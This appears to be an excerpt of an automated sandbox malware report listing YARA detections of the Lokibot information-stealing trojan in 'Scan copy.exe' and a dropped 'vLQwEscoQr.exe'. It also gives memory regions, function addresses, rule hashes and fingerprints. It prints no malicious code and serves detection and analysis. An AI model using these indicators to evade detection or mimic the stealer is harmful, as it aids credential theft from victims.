                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_00B443E80_2_00B443E8
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_00B4E0940_2_00B4E094
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_00B4705B0_2_00B4705B
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0595F7880_2_0595F788
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_059541C40_2_059541C4
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_05956D310_2_05956D31
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0595F7780_2_0595F778
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0595C8300_2_0595C830
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0595C8400_2_0595C840
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0595CAD80_2_0595CAD8
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C886800_2_06C88680
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C894C00_2_06C894C0
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C894BB0_2_06C894BB
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C873900_2_06C87390
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C86F580_2_06C86F58
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C88AB80_2_06C88AB8
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_02E343E813_2_02E343E8
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_02E3E09413_2_02E3E094
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_02E3705113_2_02E37051
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075FF78813_2_075FF788
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075F41C413_2_075F41C4
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075FF77813_2_075FF778
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075F6D3213_2_075F6D32
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075FCAD813_2_075FCAD8
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075F004013_2_075F0040
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075FC84013_2_075FC840
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_075FC83013_2_075FC830
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_0797868013_2_07978680
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_0797F53813_2_0797F538
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_079794B013_2_079794B0
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_079794C013_2_079794C0
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_0797739013_2_07977390
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_07976F5813_2_07976F58
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 13_2_07978AB813_2_07978AB8
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_0040549C20_2_0040549C
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_004029D420_2_004029D4
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: String function: 00405B6F appears 42 times
                Source: Scan copy.exe, 00000000.00000000.1248317631.00000000003FE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYbka.exeF vs Scan copy.exe
                Source: Scan copy.exe, 00000000.00000002.1290384680.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scan copy.exe
                Source: Scan copy.exe, 00000000.00000002.1297078982.0000000006C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Scan copy.exe
                Source: Scan copy.exe, 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Scan copy.exe
                Source: Scan copy.exe, 00000000.00000002.1291953890.0000000003904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Scan copy.exe
                Source: Scan copy.exeBinary or memory string: OriginalFilenameYbka.exeF vs Scan copy.exe
                Source: Scan copy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
